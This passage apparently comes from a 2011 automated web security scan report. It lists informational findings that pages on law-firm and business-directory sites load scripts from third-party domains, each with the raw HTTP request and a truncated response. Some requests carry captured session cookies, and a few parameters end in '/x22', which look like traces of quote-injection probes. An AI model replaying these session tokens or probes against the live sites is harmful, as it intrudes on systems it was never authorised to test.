Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:04:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2633790


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.99. http://www.hoganlovells.com/practiceAreas/area.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /practiceAreas/area.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /practiceAreas/area.aspx?firmService=1720 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1076; path=/
Set-Cookie: PortletId=14201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 96298


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.100. http://www.hoganlovells.com/practiceareas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /practiceareas/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /practiceareas/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:10 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1076; path=/
Set-Cookie: PortletId=14201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109369


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells depth of experience, global reach, and compr
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.101. http://www.hoganlovells.com/ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ru/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ru/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=0fb58570-9f19-42a5-a60c-094e7983785b; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93185


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...
<meta name="ROBOTS" content="NOYDIR" />
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.102. http://www.hoganlovells.com/splash/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /splash/alumni/ HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Referer: http://www.hoganlovells.com/ourpeople/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1075; PortletId=13201; SiteId=1039; SERVER_PORT=80; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=7; __utma=1.2116759900.1295449738.1295449738.1295449738.1; __utmc=1; __utmb=1.2.10.1295449738

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:19:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1219; path=/
Set-Cookie: PortletId=1293002; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 93405
Content-Length: 93405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.103. http://www.hoganlovells.com/zh-CHS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /zh-CHS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /zh-CHS/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:58:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=e1e5d709-d272-479d-b837-048485c43deb; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78931


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...
<meta name="ROBOTS" content="NOYDIR" />
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.104. http://www.info.com/washington%20dc%20law%20firms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /washington%20dc%20law%20firms HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.221CKMYU; path=/
Date: Wed, 19 Jan 2011 16:44:23 GMT
Server: Apache
Set-Cookie: b=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1295455463+last_cmp++engineset; expires=Sun, 18-Jan-2037 23:52:19 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54488

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms - www.Info.com</title><link rel="shortcut icon" href="http://gfx.info.com/commo
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://wsapi.infospace.com/infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw"></script>
...[SNIP]...

16.105. http://www.kasimer-ittig.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kasimer-ittig.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.kasimer-ittig.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:51:53 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=4052ec2bf88a4da47375c5323832d37b72f3a1d2; path=/; expires=Wed, 19-Jan-2011 17:51:53 GMT
Content-Length: 45526
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<![endif]-->


<script type="text/javascript" src="http://static-vip.school9.com/images/js/pop2click.js"></script>
...[SNIP]...
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW" />
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...

16.106. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138085
Date: Wed, 19 Jan 2011 16:52:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=pk4wl545lav5a245t34d1zys; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22&loc=Dallas%2c+TX&kw=law+offices&uid=5331dc09-813f-4b95-9237-fac957ebffac&expdate=634336159381535318&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:18 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22&exp=634310257381535318; domain=local.com; expires=Wed, 19-Jan-2011 17:22:18 GMT; path=/
Content-Length: 138085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=Attorneys+%26+Lawyers%3a+General+Practice&cat=business_professional_services&state=TX&city=Dallas&kw=law+offices"></script>
...[SNIP]...

16.107. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 72932
Date: Wed, 19 Jan 2011 16:52:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ttvxzdezqtxibt55l2f5dv45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=7504aafd-2c5e-48d0-90d2-473f5c5bc81d&expdate=634336159361775734&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:16 GMT; path=/
Content-Length: 72932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=Beauty+Salons&cat=womens_products_services&state=TX&city=Dallas&kw=none"></script>
...[SNIP]...

16.108. http://www.skadden.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.skadden.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=;expires=Tue, 19-Jan-2010 15:08:55 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Skadden</title>
<scrip
...[SNIP]...
</script>

<SCRIPT src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</SCRIPT>
...[SNIP]...

16.109. http://www.skadden.com/2011insights.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /2011insights.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011insights.cfm HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.110. http://www.skadden.com/alumni/Index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /alumni/Index.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /alumni/Index.cfm HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                           <!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w
...[SNIP]...
<!-- end border table -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.111. http://www.skadden.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /index.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                               <!DOCTYPE html PUB
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.112. http://www.usdirectory.com/gypr.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usdirectory.com
Path:   /gypr.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gypr.aspx?afid=1993&cc=5411105100&cr=3209505169&ct=Washington/x22 HTTP/1.1
Host: www.usdirectory.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:09:38 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:09:38 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <m
...[SNIP]...
<![endif]-->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- /page -->

<script type="text/javascript" src="http://download.skype.com/share/skypebuttons/js/skypeCheck.js"></script>
...[SNIP]...
<!-- googlemap -->
               <script src="http://maps.google.com/maps?file=api&amp;v=2.x&amp;key=ABQIAAAAE-JMB-o0Ahc31nQLRUnvohRaiNNwOm7lzWnD0YFBzfJl4SN-pBTDBxmf4nthO8e9WJbZEPGcSz0IDA" type="text/javascript"></script>
...[SNIP]...

